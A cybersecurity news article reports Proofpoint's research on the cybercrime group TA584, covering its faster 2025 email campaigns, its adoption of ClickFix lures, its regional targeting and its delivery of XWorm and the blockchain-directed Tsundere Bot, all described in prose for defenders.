SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers
Australia

Guides

#
cloud security
#
cybersecurity
#
endpoint protection
#
firewalls
#
ransomware

Search

German office worker phishing email ta584 shadowy hacker scene
#
Malware
#
Ransomware
#
Crypto

Proofpoint details TA584’s fast-evolving 2025 attacks

Fri, 30th Jan 2026
Author image
By Mark Tarre, News Chief

Proofpoint has reported a sharp rise in activity from TA584, a cybercriminal group it links to initial access brokering and follow-on attacks such as ransomware and data theft.

The company said the actor increased the pace and volume of its email-led campaigns during 2025, while frequently changing lures, infrastructure and payloads. Proofpoint said that approach reduced the value of static indicators and blocklists for defenders tracking the group.

Proofpoint tracks TA584 as an established actor, with activity it has monitored since 2020. It said the group's earlier operations used more repeatable patterns, compared with the faster campaign churn it observed during 2025.

Rising tempo

Proofpoint said TA584 tripled the number of monthly campaigns from March to December 2025. It said individual campaigns often stayed active for hours or days before the actor replaced them or changed key elements. Proofpoint described overlapping operations that used different themes, branding and landing pages.

The research focused on email as the initial access vector and tracked activity from message delivery through early execution. Proofpoint said it clustered campaigns using attributes such as delivery characteristics, infrastructure patterns, landing page design, geofencing behaviour and malware configuration.

TA584 overlaps with a group tracked elsewhere as Storm-0900, according to Proofpoint.

ClickFix shift

Proofpoint said a major change arrived from late July 2025 when TA584 switched to ClickFix social engineering. The technique uses fake error prompts on web pages. It directs recipients to copy, paste and run commands on their own machines.

Proofpoint said TA584's more recent chains used unique URLs for each target, along with geofencing and IP filtering. It said users who passed those checks reached a lure-matching landing page with a CAPTCHA. Proofpoint said the chain then presented ClickFix instructions that executed PowerShell, which fetched a remote script that delivered the final malware.

The company also described redirect chains and intermediary services that obscured payload locations. It said TA584 changed URLs and redirects between campaigns. It said the approach reduced visibility for sandboxes and URL scanning services.

Broader targeting

Proofpoint said TA584 historically focused on North America and parts of Europe, including the UK and Ireland. It said the actor later expanded targeting to include Germany more regularly during 2025, after earlier low-volume activity aimed at the country in 2023.

Proofpoint said campaigns rotated between regions. It said TA584 adjusted branding, language and lure themes based on target geography. It also reported limited targeting of Australia since at least spring 2025.

Message volumes ranged from a few thousand to nearly 200,000 per campaign, Proofpoint said. It described the actor as opportunistic rather than focused on a particular industry, while noting recurring impersonation of healthcare and government entities.

The company said TA584's impersonations spanned recruitment and business services firms and well-known brands. Themes included tax obligations, payments, parking tickets, medical test results and business complaints. Proofpoint also highlighted one campaign that used an image of purported physical mail that included the target's name and address.

New malware

Proofpoint said TA584 continued to deliver XWorm during 2025, using a configuration it labels "P0WER". XWorm is a remote access trojan that has circulated since 2022 and is sold on criminal forums, Proofpoint said.

It also reported a new addition from late November 2025, when TA584 began distributing Tsundere Bot alongside XWorm. Proofpoint described Tsundere Bot as malware-as-a-service with backdoor and loader functions.

Proofpoint said Tsundere Bot uses blockchain-based command-and-control discovery. It said the malware retrieves command-and-control and configuration information from the Ethereum blockchain via multiple RPC providers, and then communicates with command-and-control over WebSockets. It said the tooling includes a panel that offers installer generation and a market for buying and selling infected machines.

Proofpoint said Tsundere Bot requires Node.js on the infected system. It said installer scripts can fetch and install Node.js, then deploy the malware. It also said the malware checks system locale and exits when it detects CIS country languages.

Proofpoint said earlier TA584 payloads over the years included Ursnif, LDR4, WarmCookie, Xeno RAT and Cobalt Strike, with a single outlier campaign distributing DCRAT in September 2025.

Proofpoint described TA584 as an initial access broker, with infections that can lead to ransomware. It said the group's activity showed ties to the Russian cybercriminal ecosystem based on malware and artefacts used in its chains.

One context point from Proofpoint's analysis concerned defensive strategy against the group's pace of change.

"The research we're publishing this week represents the most comprehensive public look into the prominent cybercrime threat actor TA584. Frequently targeting North America and Europe with sophisticated social engineering and constantly changing techniques, TA584 shows how criminals can be very creative and rapidly innovate to target people more effectively. In 2025, TA584 demonstrated major changes, including new social engineering techniques like ClickFix, and using new malware called Tsundere Bot, which it continues to use in ongoing campaigns. Because of its unique campaigns, static detections and reliance on IOCs alone are not effective defences against this actor.

By understanding behaviour of actors like TA584, organisations can better understand and defend against the evolving cybercriminal threat landscape. We know that criminals learn from each other, and it's possible this actor's high-volume, highly customised, and persistently evolving activity may be adopted by more actors in the future," said Selena Larson, Senior Threat Intelligence Analyst, Proofpoint.

Proofpoint said it expects TA584 to continue experimenting with payloads and to keep changing its infrastructure and lures as it rotates targeting across regions.

Related stories
Gartner warns misconfigured AI could halt G20 power
Okta warns of North Korean fraud in remote tech hiring
CBA warns young Aussies of fake job and dating scam losses
McAfee warns Australians of AI-fuelled Valentine scams
Exclusive: Coding, kids, and the invisible double shift of tech mums

Top stories

D-Link taps Dicker Data to grow converged security reach
LummaStealer returns post-takedown with ClickFix ruse
Proofpoint buys Acuvity to secure AI agents at work
Okta unveils tools to detect & govern shadow AI risks
Arctic Wolf unveils Aurora managed endpoint tools for MSPs